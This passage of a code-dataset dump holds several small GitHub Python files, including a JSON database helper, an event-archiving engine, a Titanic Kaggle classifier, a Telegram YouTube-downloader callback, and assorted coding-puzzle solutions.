\", unsafe_allow_html=True)\r\n\r\n","repo_name":"Divyraj-K/Diamonds-Price-Predication-App","sub_path":"Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":7563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14726026404","text":"import json\n\n\n# Need test\ndef save_db(db_to_save, file_name):\n try:\n with open(f'db/{file_name}', 'w') as file:\n json.dump(db_to_save, file)\n except NameError :\n print(f'{file_name} : Can Not Save. Database Files Not Found')\n\ndef load_db(file_name):\n try:\n with open(f'db/{file_name}', 'r') as file:\n return json.load(file)\n except FileNotFoundError as e :\n print(f'load_db() : {e}\\nrun \"fixdb\" command in main console')\n\n","repo_name":"MohandZaid/Crowd-Funding-App","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2925367532","text":"from carchiver import carchiver\n\nfrom cengine import cengine\n\nNAME=\"eventstore\"\n\nclass engine(cengine):\n\tdef __init__(self, *args, **kargs):\n\t\tcengine.__init__(self, name=NAME, *args, **kargs)\n\t\t\n\t\tself.archiver = carchiver(namespace='events', autolog=True, logging_level=self.logging_level)\n\t\t \n\tdef work(self, event, *args, **kargs):\n\t\tevent_id = event['rk']\n\t\t\n\t\texchange = None\n\t\ttry:\n\t\t\texchange = event['exchange']\n\t\t\tdel event['exchange']\n\t\texcept:\n\t\t\tpass\n\t\t\t\n\t\tevent_types = ['check', 'trap', 'comment', 'log', 'user', 'selector', 'sla', 'perf', 'eue', 'topology', 'consolidation']\n\t\tevent_type = event['event_type']\n\t\t\n\t\tif event_type not in event_types:\n\t\t\tself.logger.warning(\"Unknown event type '%s', id: '%s', event:\\n%s\" % (event_type, event_id, event))\n\t\t\treturn event\n\t\t\n\t\t## Archive event\n\t\tif event_type == 'perf' :\n\t\t\tpass\n\t\telif event_type == 'check' or event_type == 'selector' or event_type == 'sla' or event_type == 'eue' or event_type == 'topology' or event_type == 'consolidation':\n\t\t\t\n\t\t\t_id = self.archiver.check_event(event_id, event)\n\t\t\tif _id:\n\t\t\t\tevent['_id'] = _id\n\t\t\t\tevent['event_id'] = event_id\n\t\t\t\t## Event to Alert\n\t\t\t\tself.amqp.publish(event, event_id, self.amqp.exchange_name_alerts)\n\n\t\telif event_type == 'trap' or event_type == 'log':\n\t\t\t\n\t\t\t## passthrough\n\t\t\tself.archiver.store_event(event_id, event)\n\t\t\t_id = self.archiver.log_event(event_id, event)\n\t\t\tevent['_id'] = _id\n\t\t\tevent['event_id'] = event_id\n\n\t\t\t## Event to Alert\n\t\t\tself.amqp.publish(event, event_id, self.amqp.exchange_name_alerts)\n\t\t\t\n\t\telif event_type == 'user' or event_type == 'comment':\n\t\t\t\n\t\t\t## passthrough\n\t\t\t_id = self.archiver.log_event(event_id, event)\n\t\t\tevent['_id'] = _id\n\t\t\tevent['event_id'] = event_id\n\n\t\t\t## Event to Alert\n\t\t\tself.amqp.publish(event, event_id, self.amqp.exchange_name_alerts)\n\t\t\t\n\t\treturn event\n","repo_name":"chiehwen/canopsis","sub_path":"sources/amqp2engines/opt/amqp2engines/engines/eventstore.py","file_name":"eventstore.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"40049942038","text":"import os\nimport cv2\nimport numpy as np\n\n# Read imgs from test-classes folders as an array\ndef load_data(path, print_file_read = True):\n '''\n :param path(str): root path of 
dataset, e.g.\"/Users/shenyi/Desktop/Gamepipe/trainset/\"\n :param print_file_read(bool): show current processing file names\n :return np.array(imgs): numpy format array of images, with shape (num_of_pictures, width, length, channels)\n ap.array(labels): numpy format array of labels\n '''\n imgs = []\n labels = []\n cates = next(os.walk(path))[1]\n folders = [path + x for x in cates if os.path.isdir(path + x)]\n\n for idx, folder in enumerate(folders):\n i = 1\n for root, subFolers, files in os.walk(folder):\n for file in files:\n if (os.path.splitext(file)[1] in ['.jpg', '.bmp', '.png', 'jpeg']):\n img_path = os.path.join(root, file)\n if (print_file_read):\n print('Reading image %d:%s' % (i, img_path))\n img = cv2.imread(img_path)\n imgs.append(img)\n labels.append(idx)\n\n return np.array(imgs), np.array(labels)\n\n\ndef main():\n load_data(\"/Users/shenyi/Desktop/Gamepipe/trainset/\")\n\nif __name__ == '__main__':\n main()","repo_name":"shen-ee/GHD-helper","sub_path":"img_reader.py","file_name":"img_reader.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14217871949","text":"def f(x):\n left,right,keta = 1,10,1 #!(left,right]\n res = 0\n mod = 10**9 + 7\n while True:\n right = min(right,x+1)\n res += keta*(left+right-1)*(right-left) // 2\n if right == x+1:\n return res\n res %= mod\n left *= 10\n right *= 10\n keta += 1\n\ndef main():\n mod = 10**9+7\n L,R = map(int,input().split())\n ans = f(R) - f(L-1)\n print(ans % mod)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tokuD/atcoder","sub_path":"tenkei90/082.py","file_name":"082.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42039186096","text":"# Jump sort will jump some steps\n# When the next step is greater than finding elements\n# It will get back to previous element\n# And perform linear sort\n\n# Time Complexity is O(n^0.5)\n\n\ndef jump_search(arr, find):\n length = len(arr)\n\n step = pow(length, 0.5)\n\n prev = 0\n\n while arr[int(min(step, length) - 1)] < find:\n prev = int(step)\n step += pow(length, 0.5)\n if prev >= find:\n return -1\n\n while arr[prev] < find:\n prev += 1\n\n if prev == min(step, length):\n return -1\n\n if arr[prev] == find:\n return prev\n\n\nelement_list = [0, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nfind = 1\n\nindex = jump_search(element_list, find)\nif index:\n print(f\"Element found at {index + 1} position.\")\nelse:\n print(\"Element is not present in given list.\")\n","repo_name":"ArjunKhunti/searching-algos","sub_path":"python3/jump_search.py","file_name":"jump_search.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14799864215","text":"#Sue Huang\n#03/13/19\n#uses the food python library USDA\n#searches the food library for all descriptions\n#makes them lowercase and word tokenizes them\n\n\n#drag the .py and .db files into env/lib/PythonX/site-packages/\n#https://think.cs.vt.edu/corgis/python/food/food.html\n#download sqlite browser to view db of food\n\n\n\n\nimport food\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tokenize import word_tokenize\nfrom itertools import permutations #to iterate through lists in permutations and combinations\n\n#list_of_report is a list of dictionaries\nlist_of_report = food.get_reports()\n\n#for key in list_of_report:\n 
#print(key)\n#print(isinstance(list_of_report,list))\n#print(isinstance(list_of_report[0],dict))\n\n#for food in list_of_report:\n #category = food[\"Category\"]\n #print(category)\n \nfor food in list_of_report:\n description = food[\"Description\"].lower() #converts everything to lower case\n tokens = word_tokenize(description)\n words = [word for word in tokens if word.isalpha()] #removes commas\n #do a replacement of abbreviations with full words for example inst with instant and whl with whole\n #print(words)\n for word in words:\n #if word == \"pudding\":\n min_perm = 1\n max_perm = 3\n wd_permutations = []\n for x in range(min_perm, max_perm):\n for y in permutations(words, x):\n wd_permutations.append(y)\n #wd_permutations = permutations(words, 2)\n wd_permutation_list = list(wd_permutations)\n print(wd_permutation_list)\n #print(type(wd_permutation_list))\n\n\n#we will search for what \"clouds taste like\" in the twitter data and if something in the string is equivalent to portions of string from description, then we will count that as an ingredient for the ice cream","repo_name":"esesms/collectclouds","sub_path":"examples/db_flavor_search.py","file_name":"db_flavor_search.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11714875457","text":"import os\nimport numpy as np\nimport gpitch\nfrom gpitch.methods import readaudio\n\n\ndef load_filenames(path, inst, names):\n files = np.asarray(os.listdir(path)) # load name all files in directory\n nfiles = len(files) # number of files in directory\n\n flag = np.asarray(nfiles * [None]) # flag to mark if name of instrument present in filename\n for i in range(nfiles): # mark file names with instrument in it\n flag[i] = files[i].find(inst)\n\n idx = np.where(flag != -1)[0] # choose only file names with instrument\n files = files[idx]\n\n final_list = len(files) * [None]\n for i in range(len(names)):\n flag = np.asarray(len(files) * [None]) # flag to mark if name of pitch/mixture present in filename\n for j in range(len(files)):\n flag[j] = files[j].find(names[i])\n idx = np.where(flag != -1)[0] # choose only file name specific pitch/mixture\n final_list[i] = files[idx][0]\n\n return final_list\n\n\ndef load_traindata(path, inst, frames=-1, start=0):\n \"\"\"Load test data, that is, mixture and sources.\"\"\"\n names = ['_M60_', '_M64_', '_M67_']\n filenames = load_filenames(path=path, inst=inst, names=names)\n\n x, aux, fs = readaudio(fname=path + filenames[0], frames=frames, start=start)\n traindata = [readaudio(fname=path + filenames[i], frames=frames, start=start, scaled=True)[1]\n for i in range(len(filenames))]\n return x, traindata, fs, filenames\n\n\ndef load_testdata(path, inst, frames=-1, start=0):\n \"\"\"Load test data, that is, mixture and sources.\"\"\"\n names = ['mixture', '_C_', '_E_', '_G_']\n filenames = load_filenames(path=path, inst=inst, names=names)\n\n x, y, fs = readaudio(fname=path + filenames[0], frames=frames, start=start)\n sources = [readaudio(fname=path + filenames[i], frames=frames, start=start)[1] for i in range(1, len(filenames))]\n mix = sum(sources)\n return x, mix, sources, fs, filenames\n\n\ndef get_kernel_features(filenames, ytrain, maxh, fs):\n num_pitches = len(filenames)\n if0 = gpitch.find_ideal_f0(filenames) # ideal frequency for each pitch\n all = [gpitch.init_cparam(y=ytrain[i], fs=fs, maxh=maxh, ideal_f0=if0[i], scaled=False) for i in range(num_pitches)]\n freq_feat = num_pitches*[None]\n 
var_feat = num_pitches*[None]\n for i in range(num_pitches):\n freq_feat[i] = all[i][0].copy()\n var_feat[i] = all[i][1].copy()\n return all, freq_feat, var_feat\n","repo_name":"PabloAlvarado/ssgp","sub_path":"gpitch/srcs.py","file_name":"srcs.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"74062640411","text":"from __future__ import annotations\n\nfrom enum import Enum\nfrom typing import Any, cast\n\nfrom jsonpath_ng import JSONPath as JsonPath\nfrom jsonpath_ng import parse\n\nfrom commanderbot.lib.responsive_exception import ResponsiveException\n\n__all__ = (\n \"JsonPath\",\n \"JsonPathOp\",\n \"parse_json_path_op\",\n \"parse_json_path\",\n \"query_json_path\",\n \"update_json_with_path\",\n)\n\n\nclass JsonPathOp(Enum):\n set = \"set\"\n merge = \"merge\"\n append = \"append\"\n prepend = \"prepend\"\n\n\ndef parse_json_path_op(op: str) -> JsonPathOp:\n try:\n return JsonPathOp[op]\n except:\n raise ResponsiveException(f\"No such operation: `{op}`\")\n\n\ndef parse_json_path(path: str) -> JsonPath:\n try:\n return cast(JsonPath, parse(path))\n except:\n raise ResponsiveException(f\"Malformed JSON path: `{path}`\")\n\n\ndef query_json_path(target: Any, path: JsonPath) -> Any:\n nodes = list(path.find(target))\n if not nodes:\n raise ResponsiveException(f\"No such value: `{path}`\")\n if len(nodes) == 1:\n return nodes[0].value\n values = [node.value for node in nodes]\n return values\n\n\ndef update_json_with_path(target: Any, path: JsonPath, op: JsonPathOp, value: Any):\n if op == JsonPathOp.set:\n path.update_or_create(target, value)\n elif op == JsonPathOp.merge:\n if not isinstance(value, dict):\n raise ValueError(f\"Expected `dict`, got `{type(target).__name__}`\")\n for node in path.find_or_create(target):\n if isinstance(node.value, dict):\n node.value.update(value)\n elif op == JsonPathOp.append:\n for node in path.find_or_create(target):\n if isinstance(node.value, list):\n node.value.append(value)\n elif op == JsonPathOp.prepend:\n for node in path.find_or_create(target):\n if isinstance(node.value, list):\n node.value.insert(0, value)\n else:\n raise ResponsiveException(f\"Unsupported operation: `{op.value}`\")\n","repo_name":"CommanderBot-Dev/commanderbot-py","sub_path":"commanderbot/lib/utils/json_path.py","file_name":"json_path.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"32158506751","text":"import torch\nimport timm\n\nclass BaseEncoder(torch.nn.Module):\n def __init__(self,encoder_name,subtype,aux_hog):\n super().__init__()\n \n if aux_hog:\n in_channel = 4\n else:\n in_channel = 3\n self.aux_hog = aux_hog\n \n if encoder_name is not None:\n self.encoder = timm.create_model('_'.join([encoder_name,subtype]), pretrained=True, features_only=True, in_chans=in_channel)\n self.out_channels = self.encoder.feature_info.channels()\n \n def HOG_descriptor(self,img,ks):\n if ks == 2:\n hk = torch.tensor([1.,-1.],device=img.device)[None,None,:,None].tile(3,1,1,1)\n vk = torch.tensor([-1.,1.],device=img.device)[None,None,None,:].tile(3,1,1,1)\n else:\n hk = torch.tensor([1.,0.,-1.],device=img.device)[None,None,:,None].tile(3,1,1,1)\n vk = torch.tensor([-1.,0.,1.],device=img.device)[None,None,None,:].tile(3,1,1,1)\n \n vd_image = torch.amax(torch.nn.functional.conv2d(img,vk,padding='same',groups=3),dim=1,keepdim=True)\n hd_image = 
torch.amax(torch.nn.functional.conv2d(img,hk,padding='same',groups=3),dim=1,keepdim=True)\n mag_image = torch.sqrt(vd_image**2+hd_image**2)\n return mag_image\n \n def HOG_max_min_norm(self,x):\n max_v = torch.amax(x,dim=[2,3],keepdim=True)\n min_v = torch.amin(x,dim=[2,3],keepdim=True)\n x = (x-min_v)/(max_v-min_v)\n return x\n \n def forward(self,x):\n if self.aux_hog:\n hog = torch.maximum(self.HOG_descriptor(x,2),self.HOG_descriptor(x,3)) ** 0.5\n hog = self.HOG_max_min_norm(hog)\n x = torch.concat([x,hog],dim=1)\n fms = self.encoder(x)\n return fms","repo_name":"you-ming-hu/Golfer_Motion_Tracking","sub_path":"DL_approach/implementation/core/model/encoders/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16961881856","text":"from asyncio import get_event_loop\nfrom os import path, makedirs, getcwd, remove\nfrom tempfile import NamedTemporaryFile\n\n\nfrom pyrogram import (Client, ContinuePropagation, filters)\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, InputMediaAudio, InputMediaVideo, CallbackQuery\n\nfrom helper.ffmfunc import duration\nfrom helper.ytdlfunc import downloadvideocli, downloadaudiocli\nfrom PIL.Image import open\nfrom hachoir.metadata import extractMetadata\nfrom hachoir.parser import createParser\nfrom utils.database.models import Youtube_videos\n\n\n@Client.on_callback_query()\nasync def catch_youtube_dldata(c, q: CallbackQuery):\n cb_data = q.data.strip()\n media_type = cb_data.split(\"||\")[1]\n video_id = cb_data.split(\"||\")[-1]\n format_id = cb_data.split(\"||\")[-2]\n \n thumb_image = q.message.photo.file_id\n video = await Youtube_videos.filter(id=int(video_id)).first()\n\n tf = NamedTemporaryFile(prefix=\"media_\", suffix=\".%(ext)s\")\n filepath = tf.name.replace('/tmp/', '')\n\n yturl = video.video_url\n\n audio_command = [\n \"youtube-dl\",\n \"-c\",\n \"--prefer-ffmpeg\",\n \"--extract-audio\",\n \"--audio-format\", \"mp3\",\n \"--audio-quality\", \"bestaudio\",\n \"-o\", filepath,\n yturl,\n\n ]\n\n video_command = [\n \"youtube-dl\",\n '-c',\n '-k',\n \"-f\", f\"{format_id}\",\n \"--hls-prefer-ffmpeg\", yturl,\n \"-o\", filepath\n ]\n\n video_command.append(\"--no-warnings\")\n video_command.append(\"--restrict-filenames\")\n\n \n\n med = None\n if media_type == \"audio\":\n filename = await downloadaudiocli(audio_command)\n med = InputMediaAudio(\n media=filename,\n thumb=thumb_image,\n caption=path.basename(filename),\n title=path.basename(filename)\n )\n\n if media_type == \"video\":\n filename = await downloadvideocli(video_command, filepath)\n # dur = round((await duration(filename)))\n if filename:\n print(filename)\n med = InputMediaVideo(\n media=filename,\n # duration=dur,\n thumb=thumb_image,\n caption=path.basename(filename),\n supports_streaming=True\n )\n\n if med:\n await send_file(c, q, med, filename)\n else:\n print(\"med not found\")\n\n\nasync def send_file(c, q, med, filename):\n try:\n await q.edit_message_reply_markup(\n InlineKeyboardMarkup([[InlineKeyboardButton(\"Uploading...\", callback_data=\"down\")]]))\n await c.send_chat_action(chat_id=q.message.chat.id, action=\"upload_video\")\n await q.edit_message_media(media=med)\n except Exception as e:\n print(e)\n await q.edit_message_text(e)\n finally:\n try:\n remove(filename)\n except:\n 
pass\n","repo_name":"tilonuz99/Youtube-Downloader-Bot","sub_path":"old_videodownloader/plugins/youtube_callback_data.py","file_name":"youtube_callback_data.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"29743596906","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n'''\ncreated on 2019-6-2\n@author:Jayce Gao\nproject:\n'''\nimport json\nfrom time import sleep\nfrom typing import List, Dict\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nclass TestWeChat():\n def setup(self):\n # chrome启动时属性的类,复用浏览器\n # 声明一个变量,设置为chromeoptions\n c_options = webdriver.ChromeOptions()\n # 设置debug模式相同的端口号\n c_options.debugger_address = \"127.0.0.1:9222\"\n self.driver = webdriver.Chrome()\n self.driver.get(\"https://work.weixin.qq.com/\")\n self.driver.find_element(By.XPATH, '//*[@id=\"indexTop\"]/div[2]/aside/a[1]')\n\n def teardown(self):\n self.driver.quit()\n\n def test_wechat(self):\n # self.driver.get(\"https://home.testing-studio.com\")\n '''\n self.driver.find_element(By.CSS_SELECTOR, \".index_service_cnt_item_title\").click()\n sleep(3)\n '''\n # sleep(15)\n # cookies = self.driver.get_cookies()\n # # 写入cookies\n # with open(\"cookies.txt\", \"w\") as f:\n # json.dump(cookies, f)\n\n # 读取cookies\n with open(\"cookies.txt\", \"r\") as f:\n cookies: List[Dict] = json.load(f)\n for cookie in cookies:\n if \"expiry\" in cookie.keys():\n cookie.pop(\"expiry\")\n self.driver.add_cookie(cookie)\n sleep(3)\n","repo_name":"Jaycegao/hogwarts","sub_path":"企业微信实战/main/test_wechat.py","file_name":"test_wechat.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16702000781","text":"from causallearn.utils.cit import CIT\nimport pandas as pd, numpy as np\n\ndef KCIT(X, Y, Z, **kargs):\n X, Y, Z = map(lambda x: (x - np.mean(x)) / np.std(x), (X, Y, Z))\n data = np.column_stack((X, Y, Z))\n dz = Z.shape[1]\n kci = CIT(method='kci', data=data)\n p_value = kci(0, 1, list(range(2, 2 + dz)))\n return p_value","repo_name":"baosws/DINE","sub_path":"src/methods/KCIT.py","file_name":"KCIT.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"17863203839","text":"# logn for update\ndef update(mode, val, i, left, right, tree, index):\n if i < left or i > right:\n return\n if left == right:\n if mode == \"S\":\n tree[index] = (-1)**i * val\n else:\n tree[index] = (-1)**i * val * (i+1)\n return\n mid = left + (right-left)//2\n update(mode, val, i, left, mid, tree, 2*index+1)\n update(mode, val, i, mid+1, right, tree, 2*index+2)\n tree[index] = tree[2*index+1] + tree[2*index+2]\n\n\ndef build_util(mode, tree, ss, se, arr, si):\n if ss == se:\n if mode == \"S\":\n tree[si] = (-1)**ss * arr[ss]\n else:\n tree[si] = (-1)**ss * arr[ss] * (ss+1)\n return\n mid = ss + (se-ss)//2\n build_util(mode, tree, ss, mid, arr, 2*si+1)\n build_util(mode, tree, mid+1, se, arr, 2*si+2)\n tree[si] = tree[2*si+1] + tree[2*si+2]\n\n\n# O(n) to build\ndef build(arr, N, mode):\n tree = [0] * (2*N-1)\n build_util(mode, tree, 0, N-1, arr, 0)\n return tree\n\n\ndef query_util(tree, qs, qe, ss, se, si):\n if qs > se or qe < ss:\n return 0\n if qs <= ss and qe >= se:\n return tree[si]\n mid = ss + (se-ss)//2\n left = query_util(tree, qs, qe, ss, mid, 2*si+1)\n right = query_util(tree, qs, qe, mid+1, se, 2*si+2)\n return 
left+right\n\n\ndef query(tree1, tree2, start, end, N):\n # (-1)^start * (tree2[start, end] - tree1[start, end] * start)\n val2 = query_util(tree2, start, end, 0, N-1, 0)\n val1 = query_util(tree1, start, end, 0, N-1, 0)\n return (-1)**start * (val2 - val1 * start)\n\n\ndef solve():\n N, Q = map(int, input().split())\n candies = [int(c) for c in input().split() ]\n # construct a segment tree (-1)^i A(i)\n tree1 = build(candies, N, \"S\")\n # construct a segment tree (-1)^i A(i)*i\n tree2 = build(candies, N, \"M\")\n ans = 0\n for i in range(Q):\n q, a, b = input().split()\n a, b = int(a), int(b)\n if q == \"Q\":\n ans += query(tree1, tree2, a-1, b-1, N)\n elif q == \"U\":\n update(\"S\", b, a-1, 0, N-1, tree1, 0)\n update(\"M\", b, a-1, 0, N-1, tree2, 0)\n return ans\n\nT = int(input())\nfor c in range(T):\n print(\"Case #{}: {}\".format(c+1, solve()))\n\n\n\n","repo_name":"anh072/kickstart","sub_path":"2020/C/candies.py","file_name":"candies.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8184148147","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn import tree, linear_model, model_selection, preprocessing\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nimport sklearn\nsns.set()\n\ntrain = pd.read_csv('train.csv')\ntest = pd.read_csv('test.csv')\n\n# Put the two dataset together to efficiently numerize the string values\ntrain_data_set = [train, test]\n\n# Set the option to show all columns in the dataframe of the Python IDE console\n#pd.set_option('display.expand_frame_repr', False)\npd.options.display.width = 0\npd.set_option('display.max_rows', 800)\n\n\n# The following method is used to 'clean' the data where strings are converted to integer and Nan are filled.\nfor dataset in train_data_set:\n # changes male gender to 0 and female gender to 1\n dataset.loc[dataset['Sex'] == 'male', 'Sex'] = 0\n dataset.loc[dataset['Sex'] == 'female', 'Sex'] = 1\n\n # fills Nan value to S and changes the string values to 0, 1, 2 respectively\n dataset['Embarked'] = dataset['Embarked'].fillna('S')\n dataset.loc[dataset['Embarked'] == 'S', 'Embarked'] = 0\n dataset.loc[dataset['Embarked'] == 'C', 'Embarked'] = 1\n dataset.loc[dataset['Embarked'] == 'Q', 'Embarked'] = 2\n\n # instead of removing this 'Name' column, i have changed the title of Mr, Miss, Mrs, etc to various numbers 0, 1, 2, 3 respectively\n dataset['Title'] = dataset['Name'].str.extract('([A-Za-z]+)\\.', expand=False)\n title_mapping = {'Mr': 0, 'Miss': 1, 'Mrs': 2, 'Master': 3, 'Dr': 3, 'Rev': 3, 'Col': 3, 'Mlle': 3, 'Major': 3, 'Capt': 3, 'Jonkheer': 3, 'Ms': 3, 'Lady': 3, 'Sir': 3, 'Countess': 3, 'Mme': 3, 'Don': 3, 'Dona': 3}\n dataset['Title'] = dataset['Title'].map(title_mapping)\n\n # fills the Nan value of age to the median value of the various 'titles'\n dataset['Age'].fillna(dataset.groupby('Title')['Age'].transform('median'), inplace=True)\n dataset['Age'] = preprocessing.scale(dataset['Age'])\n\n # fills the Nan value of Fare to the median value based on their Pclass\n dataset['Fare'].fillna(dataset.groupby('Pclass')['Fare'].transform('median'), inplace=True)\n dataset['Fare'] = preprocessing.scale(dataset['Fare'])\n\n # Drops the 'Name' column\n dataset.drop('Name', axis = 1, inplace= True)\n\n # Drops the 'Ticket' column\n dataset.drop('Ticket', axis = 1, 
inplace=True)\n\n # Drops the 'Cabin' column\n #dataset.drop('Cabin', axis = 1, inplace=True)\n dataset['Cabin'] = dataset['Cabin'].str[:1]\n cabin_mapping = {'A': 0, 'B': 0.4, 'C': 0.8, 'D': 1.2, 'E': 1.6, 'F': 2.0, 'G': 2.4, 'H':2.8}\n dataset['Cabin'] = dataset['Cabin'].map(cabin_mapping)\n dataset['Cabin'].fillna(dataset.groupby('Pclass')['Cabin'].transform('median'), inplace=True)\n\n# print(train.head(100))\n\"\"\"\n# Linear Regression\npredict = 'Survived'\nX = train.drop(['Survived'], 1).values\ny = train[predict].values\n\nx_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size=0.1)\nlinear = linear_model.LinearRegression()\n\nlinear.fit(x_train, y_train)\nacc = linear.score(x_test, y_test)\n\nprint(acc)\n\npredictions = linear.predict(x_test)\n\nfor x in range(len(predictions)):\n print(predictions[x], x_test[x], y_test[x])\n\"\"\"\n\n\ntarget = train['Survived'].values\nfeatures = train[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Cabin', 'Embarked', 'Title']].values\n\n# Logistic Regression\ndef logistic_regression(features, target):\n logistic = linear_model.LogisticRegression()\n logistic.fit(features, target)\n acc1 = logistic.score(features, target)\n print('Logistic Regression:', acc1)\n\n scores1 = model_selection.cross_val_score(logistic, features, target, scoring='accuracy', cv=10)\n print(scores1.mean())\n\n return logistic\n\n# Logistic Regression with polynomial n=2\n\"\"\"\npoly = preprocessing.PolynomialFeatures(degree=2)\nfeatures_ = poly.fit_transform(features)\nlogistic2 = linear_model.LogisticRegression(C=10, max_iter=1000)\nlogistic2.fit(features_, target)\nacc12 = logistic2.score(features_, target)\nprint('Logistic Regression with Poly(2):', acc12)\n\nscores1 = model_selection.cross_val_score(logistic2, features_, target, scoring='accuracy', cv=10)\nprint(scores1.mean())\n\"\"\"\n\n# Decision Tree\ndef decision_tree(features, target):\n decision = tree.DecisionTreeClassifier()\n decision.fit(features, target)\n acc2 = decision.score(features, target)\n print('Decision Tree:', acc2)\n\n scores2 = model_selection.cross_val_score(decision, features, target, scoring='accuracy', cv=10)\n print(scores2.mean())\n return decision\n# Random Forest\ndef random_forest(features, target):\n randomForest = RandomForestClassifier(n_estimators=12)\n randomForest.fit(features, target)\n acc3 = randomForest.score(features, target)\n print('Random Forest:', acc3)\n\n scores3 = model_selection.cross_val_score(randomForest, features, target, scoring='accuracy', cv=10)\n print(scores3.mean())\n return randomForest\n# Support Vector Machine\ndef svm(features, target):\n clf = SVC()\n clf.fit(features, target)\n acc4 = clf.score(features, target)\n print('SVM:', acc4)\n\n scores4 = model_selection.cross_val_score(clf, features, target, scoring='accuracy', cv=10)\n print(scores4.mean())\n return clf\n# KNN\ndef knn(features, target):\n knntest = KNeighborsClassifier(n_neighbors=13)\n knntest.fit(features, target)\n acc5 = knntest.score(features, target)\n print('KNN:', acc5)\n\n scores5 = model_selection.cross_val_score(knntest, features, target, scoring='accuracy', cv=10)\n print(scores5.mean())\n return knntest\n\nlogistic_regression(features, target)\ndecision_tree(features, target)\nrandom_forest(features, target)\nsvm(features, target)\nknn(features, target)\n\n#test_features = test[['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Cabin', 'Embarked', 'Title']].values\n#test_features_ = poly.fit_transform(test_features)\n#predict = 
logistic2.predict(test_features_)\n\n\"\"\"\ndef final(prediction, test):\n submission = pd.DataFrame({\n 'PassengerId' : test['PassengerId'],\n 'Survived' : prediction\n })\n submission.to_csv('submission.csv', index=False)\n\"\"\"\n#final(predict, test)\n\n\n","repo_name":"wonheejo/Kaggle_Titanic","sub_path":"Titanic1.py","file_name":"Titanic1.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38591553070","text":"sum = 0\r\nfor x in range(20):\r\n a = float(input(' please enter a number : '))\r\n sum += a\r\n\r\n if(x == 0):\r\n min = a\r\n max= a\r\n else:\r\n if(a > max):\r\n max = a\r\n if(a < min):\r\n min = a\r\n \r\n\r\navg = sum / 20\r\nprint('avg =',avg,' min =' , min , ' max =' , max)\r\n\r\ninput()\r\n ","repo_name":"amirmohamad-ahmadi/python-course","sub_path":"sixth.py","file_name":"sixth.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74072148891","text":"## 숫자 문자열과 영단어 - 2021 카카오 채용연계형 인턴십 \n## https://school.programmers.co.kr/learn/courses/30/lessons/81301\n\ndef solution(s):\n answer = s\n # mydict : key - 영단어, value - 숫자\n mydict = {'zero' : '0', 'one' : '1', 'two' : '2', 'three' : '3', 'four' : '4', \n 'five' : '5', 'six' : '6', 'seven' : '7', 'eight' : '8', 'nine' : '9'}\n \n # s 안의 영단어(key = data[0])를 숫자(value = data[1])로 replace\n # replace()는 string에만 적용되므로, data[1]을 str로 cast\n for data in mydict.items():\n answer = answer.replace(data[0], data[1]) \n \n # answer는 string이므로 int로 cast\n return int(answer)\n \n","repo_name":"DongEon31/CodingTest_with_Python","sub_path":"LEVEL1/숫자 문자열과 영단어.py","file_name":"숫자 문자열과 영단어.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21004803904","text":"'''\nhttps://leetcode.com/problems/maximum-number-of-balloons/submissions/\n'''\nclass Solution:\n def maxNumberOfBalloons(self, text: str) -> int:\n d={'b':0,'a':0,'l':0,'o':0,'n':0}\n for i in text:\n if(i in d):\n d[i]+=1\n \n return(min(d['b'],d['a'],d['l']//2,d['o']//2,d['n']))\n \n \n \n \n \n \n 